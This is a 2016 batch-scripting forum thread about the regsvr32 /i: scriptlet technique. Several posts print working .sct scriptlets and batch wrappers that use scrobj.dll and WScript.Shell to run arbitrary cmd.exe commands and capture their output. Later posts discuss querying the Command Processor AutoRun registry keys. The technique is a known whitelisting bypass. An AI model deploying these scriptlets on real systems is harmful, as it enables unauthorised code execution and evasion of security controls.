Page 1 of 1
Regsrv32 exploit
Posted: 26 Apr 2016 04:58
by npocmaka_
Re: Regsrv32 exploit
Posted: 26 Apr 2016 14:08
by jeb
Nice, I tested it and it works
But I can't see a possibility to add parameters to the regsvr32 line.
As regsvr32 accepts a /c option, this could be useful for the FOR/F problem with autorun
SO:How to specify /D in FOR command?.
Something like
Code: Select all
set "comspec=C:\windows\system32\regsvr32.exe"
set "WRAP=/s /n /u /i:file:///%~dp0wrapper.sct scrobj.dll"
for /F "delims=" %%A in ('%WRAP% echo %TIME%') do echo #%%A
But the wrapper.sct doesn't see the DIR command (currently).
wrapper.sct
Code: Select all
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Empire"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c");
]]>
</script>
</registration>
</scriptlet>
The problem is, that it expands to
Code: Select all
regsvr32.exe /s /n /u /i:file:///c:\temp\wrapper.sct scrobj.dll echo 17:55:00
But wrapper.sct will not see the "echo 17:55:00"
Re: Regsrv32 exploit
Posted: 27 Apr 2016 06:43
by npocmaka_
jeb wrote:Nice, I tested it and it works
...
The bad thing is that sct does not recognize WScript.Arguments nor can handle ('Scripting.FileSystemObject').GetStandardStream(1/0) because it is the regsrv that starts the file...
Re: Regsrv32 exploit
Posted: 27 Apr 2016 15:24
by npocmaka_
But environment variables can be expanded in the sct file:
Code: Select all
set "wcom=pause"
set "comspec=C:\windows\system32\regsvr32.exe"
set "WRAP=/s /n /u /i:file:///%~dp0wrapper.sct scrobj.dll"
for /F "delims=" %%A in ('%WRAP%') do echo #%%A
and the wrapper:
Code: Select all
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Empire"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell");
var command=r.ExpandEnvironmentStrings("%wcom%");
r.Run("cmd.exe /c " + command);
]]>
</script>
</registration>
</scriptlet>
Re: Regsrv32 exploit
Posted: 27 Apr 2016 16:17
by npocmaka_
If WScript.Shell Exec() method is used instead of Run() the out can be read:
Code: Select all
@echo off
set "wcom=echo --#--&pause"
::set "comspec=C:\windows\system32\regsvr32.exe"
set "WRAP=/s /n /u /i:file:///%~dp0wrapper.sct scrobj.dll"
for /F "delims=" %%A in ('%WRAP%') do echo #%%A
regsvr32 /s /n /u /i:file:///%~dp0wrapper.sct scrobj.dll |more
and the wrapper:
Code: Select all
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Empire"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell");
var command=r.ExpandEnvironmentStrings("%wcom%");
var res=r.Exec("cmd.exe /c " + command);
new ActiveXObject('Scripting.FileSystemObject').GetStandardStream(1).Write(res.StdOut.ReadLine());
]]>
</script>
</registration>
</scriptlet>
Re: Regsrv32 exploit
Posted: 28 Apr 2016 04:43
by jeb
Nice work.
I changed the wrapper.sct to support more than one line of output.
Code: Select all
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Empire"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell");
var command=r.ExpandEnvironmentStrings("%wcom%");
var res=r.Exec("cmd.exe /c \"" + command + "\"");
var stdout=new ActiveXObject('Scripting.FileSystemObject').GetStandardStream(1);
while ( !res.StdOut.AtEndOfStream)
{
stdout.WriteLine(res.StdOut.ReadLine() );
}
]]>
</script>
</registration>
</scriptlet>
Re: Regsrv32 exploit
Posted: 06 May 2016 13:02
by Sponge Belly
Hi Guys!
Fascinating discovery, but not even MS can ignore a security hole
that big. No doubt it will be patched in an upcoming update. I’m more concerned with the AUTORUN issue, which I was unaware of until now.
Short of querying the Registry to make sure the AUTORUN key is empty whenever I want to use a for /f loop, what can I do about it?
Any suggestions appreciated.
- SB
Re: Regsrv32 exploit
Posted: 12 May 2016 02:06
by npocmaka_
Sponge Belly wrote:Hi Guys!
Short of querying the Registry to make sure the AUTORUN key is empty whenever I want to use a for /f loop, what can I do about it?
Any suggestions appreciated.
- SB
What is this about?Can you give more info.
Re: Regsrv32 exploit
Posted: 29 May 2016 02:29
by Ed Dyreen
It looks interesting but I don't understand this, what can a person do with this, how is this a security hole ?
Re: Regsrv32 exploit
Posted: 01 Jul 2016 15:30
by Sponge Belly
Hi Vasil,
Sorry for the delay in replying. I was referring to the SO link Jeb mentioned in his reply to the OP. If I understand correctly, the following Registry keys are queried every time a for /f loop is executed:
Code: Select all
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
There is no way to prevent this short of using the wrapper developed by Jeb and yourself.
So my question is, how can I do the following?
- Check if the Registry keys have values.
- If true, save the values to temp variables, and delete the keys.
- Execute my for /f loops safely.
- Restore original values of keys.
Can a Batch file do this without triggering the UAC prompt? And finally, isn’t this an awful lot of work to handle a situation which will probably never arise?
Thanks!
- SB
Re: Regsrv32 exploit
Posted: 03 Jul 2016 06:08
by foxidrive
Is this for your own use on your PC or is it to run on any persons PC?
Test this code to see if anything is printed to the screen above the 'press any key prompt'.
If reg query doesn't raise a UAC prompt then you can use it to set a variable to anything that is in these keys.
Code: Select all
@echo off
reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor" /v AutoRun 2>nul
reg query "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /v AutoRun 2>nul
pause & goto :EOF
Re: Regsrv32 exploit
Posted: 05 Sep 2016 10:39
by Sponge Belly
Hi Foxi,
Thanks for your helpful suggestion and sorry for not replying sooner. I’ve been wracking my brains over this and I haven’t been able to come up with a practical solution.
Ideally, I want to write robust code that will work on all versions of Windows and won’t be tripped up by gotchas like commands stored in the AutoRun keys. But it’s such an unlikely edge case that the cost of regularly checking for it isn’t worth the effort.
- SBPS: Maybe this is something your
sccript to gather information could check for?